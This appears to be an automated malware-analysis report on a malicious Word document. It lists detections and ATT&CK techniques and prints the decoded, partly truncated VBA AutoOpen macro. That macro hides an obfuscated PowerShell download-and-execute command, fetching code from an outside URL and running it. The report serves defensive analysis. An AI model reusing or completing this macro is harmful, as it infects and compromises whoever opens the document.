MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call to execute a command, likely to download and run a second-stage payload. The obfuscated script attempts to construct a command string, but the full URL or executable path could not be fully reconstructed due to truncation.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6466406-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6466406-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6215 bytes |
SHA-256: 08bdb37ec23c670408d2b410b19d589136fbde310ba2449ef7816fc5b96fb857 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "prodigy"
Sub AutoOpen()
Dim DL_TC As String
FL_PH = Array("c", " ", "w", "u", "e", "h", "b", "o", "-", "a", "d", "n", "p", "t", "y", "s", "r", "x", "i", "l")
Dim EP_TH As String
EP_TH = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
DL_TC = DL_TC + FL_PH(12)
DL_TC = DL_TC + FL_PH(7)
Dim IS_NH As String
IS_NH = "AHsAcgBlAHQAdQByAG4A"
DL_TC = DL_TC + FL_PH(2)
DL_TC = DL_TC + FL_PH(4)
Dim JK_MD As String
JK_MD = "IABbAFMAeQBzAHQA"
DL_TC = DL_TC + FL_PH(16)
DL_TC = DL_TC + FL_PH(15)
Dim EQ_TI As String
EQ_TI = "ZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA"
DL_TC = DL_TC + FL_PH(5)
DL_TC = DL_TC + FL_PH(4)
Dim IP_KF As String
IP_KF = "G4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAa"
IT_TJ = IT_TJ & EP_TH & IS_NH & JK_MD & EQ_TI & IP_KF
DL_TC = DL_TC + FL_PH(19)
DL_TC = DL_TC + FL_PH(19)
Dim CQ_PH As String
CQ_PH = "QBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIA"
DL_TC = DL_TC + FL_PH(1)
DL_TC = DL_TC + FL_PH(8)
Dim FM_QD As String
FM_QD = "dABdADoAOgB"
DL_TC = DL_TC + FL_PH(2)
DL_TC = DL_TC + FL_PH(18)
Dim BS_NJ As String
BS_NJ = "GAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAb"
DL_TC = DL_TC + FL_PH(11)
DL_TC = DL_TC + FL_PH(10)
Dim FP_PA As String
FP_PA = "gBnACgAJAB"
DL_TC = DL_TC + FL_PH(7)
DL_TC = DL_TC + FL_PH(2)
Dim HS_KB As String
HS_KB = "4ACkAKQB9ADsAaQBlAHgAIAAkACgAYQAgACQ"
IT_TJ = IT_TJ & CQ_PH & FM_QD & BS_NJ & FP_PA & HS_KB
DL_TC = DL_TC + FL_PH(15)
DL_TC = DL_TC + FL_PH(13)
Dim BQ_OI As String
BQ_OI = "AKAAkACgAJAAoAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBl"
DL_TC = DL_TC + FL_PH(14)
DL_TC = DL_TC + FL_PH(19)
Dim CN_LI As String
CN_LI = "AHEAdQBlAHMAdAA"
DL_TC = DL_TC + FL_PH(4)
DL_TC = DL_TC + FL_PH(1)
Dim AS_OJ As String
AS_OJ = "gACcAaAB0AHQAcABzADoALwAvAHUAc"
DL_TC = DL_TC + FL_PH(5)
DL_TC = DL_TC + FL_PH(18)
Dim BL_RF As String
BL_RF = "wBwAHIAZA"
DL_TC = DL_TC + FL_PH(10)
DL_TC = DL_TC + FL_PH(10)
Dim HK_PC As String
HK_PC = "A1ADEANQAwAGMAZQBuAHQAcgB"
IT_TJ = IT_TJ & BQ_OI & CN_LI & AS_OJ & BL_RF & HK_PC
DL_TC = DL_TC + FL_PH(4)
DL_TC = DL_TC + FL_PH(11)
Dim JP_TI As String
JP_TI = "hAGwALgB0AGEAYgBsAGUALgBj"
DL_TC = DL_TC + FL_PH(1)
DL_TC = DL_TC + FL_PH(8)
Dim BR_KI As String
BR_KI = "AG8AcgBlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8A"
DL_TC = DL_TC + FL_PH(4)
DL_TC = DL_TC + FL_PH(17)
Dim GS_PI As String
GS_PI = "dwBhAHIAZQBoAG8"
DL_TC = DL_TC + FL_PH(4)
DL_TC = DL_TC + FL_PH(0)
Dim FO_QA As String
FO_QA = "AdQBzAGUAPwAkAGYAaQBsAH"
DL_TC = DL_TC + FL_PH(3)
DL_TC = DL_TC + FL_PH(13)
Dim IR_TA As String
IR_TA = "QAZQByAD0AUABhAHIAdABpAHQAaQB"
IT_TJ = IT_TJ & JP_TI & BR_KI & GS_PI & FO_QA & IR_TA
DL_TC = DL_TC + FL_PH(18)
DL_TC = DL_TC + FL_PH(7)
Dim DT_MB As String
DT_MB = "vAG4ASwBlAHkAJQAyADAAZQBxACUAMgAwA"
DL_TC = DL_TC + FL_PH(11)
DL_TC = DL_TC + FL_PH(12)
Dim EK_PI As String
EK_PI = "CUAMgA3AHMAdABhAGcAZQA"
DL_TC = DL_TC + FL_PH(7)
DL_TC = DL_TC + FL_PH(19)
Dim AQ_OJ As String
AQ_OJ = "lADIANwAm"
DL_TC = DL_TC + FL_PH(18)
DL_TC = DL_TC + FL_PH(0)
Dim IO_NJ As String
IO_NJ = "ACQAUwBlAGwAZQB"
DL_TC = DL_TC + FL_PH(14)
DL_TC = DL_TC + FL_PH(1)
Dim FM_MB As String
FM_MB = "jAHQAPQBkAGEAdABh"
IT_TJ = IT_TJ & DT_MB & EK_PI & AQ_OJ & IO_NJ & FM_MB
DL_TC = DL_TC + FL_PH(6)
DL_TC = DL_TC + FL_PH(14)
Dim DK_RJ As String
DK_RJ = "ACYAcwB2AD0AMgAwADEANwAtADA"
DL_TC = DL_TC + FL_PH(12)
DL_TC = DL_TC + FL_
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.